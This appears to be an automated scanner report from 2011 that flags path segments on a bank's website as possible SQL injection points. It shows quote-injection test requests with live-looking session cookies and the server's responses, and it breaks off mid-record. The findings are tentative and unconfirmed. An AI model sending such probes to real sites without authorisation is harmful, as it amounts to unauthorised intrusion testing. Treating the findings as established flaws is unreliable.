The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/careers/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:03 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/careers/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:03 GMT location: http://www.bbt.com/bbt/%27%27/careers/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 137 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/careers/">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/careers'/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:36 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/careers''/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:36 GMT location: http://www.bbt.com/bbt/careers%27%27/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 136 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/careers%27%27/">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/contactus.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:20 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/contactus.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:24 GMT location: http://www.bbt.com/bbt/%27%27/contactus.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 143 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/contactus.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/contactus.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:40 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/contactus.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:40 GMT location: http://www.bbt.com/bbt/contactus.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 142 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/contactus.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:11:43 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:44 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/customerservice/default.html?WT.svl=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/customerservice/default.html?WT.svl=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:30 GMT location: http://www.bbt.com/bbt/%27%27/customerservice/default.html?WT.svl=1 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 166 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/customerservice/default.html?WT.svl=1">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/customerservice'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:42 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/customerservice''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:42 GMT location: http://www.bbt.com/bbt/customerservice%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 156 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/customerservice%27%27/default.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/customerservice/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:49 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/customerservice/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:49 GMT location: http://www.bbt.com/bbt/customerservice/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 156 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/customerservice/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:01 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:01 GMT location: http://www.bbt.com/bbt/%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 141 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/default.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:21 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:21 GMT location: http://www.bbt.com/bbt/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 140 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/includes/chat/mtagconfig.js HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 1
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 13:45:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/includes/chat/mtagconfig.js HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 2
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 13:46:00 GMT location: http://www.bbt.com/bbt/%27%27/includes/chat/mtagconfig.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 156 cache-control: private x-powered-by: ASP.NET Content-Length: 160
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/chat/mtagconfig.js">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
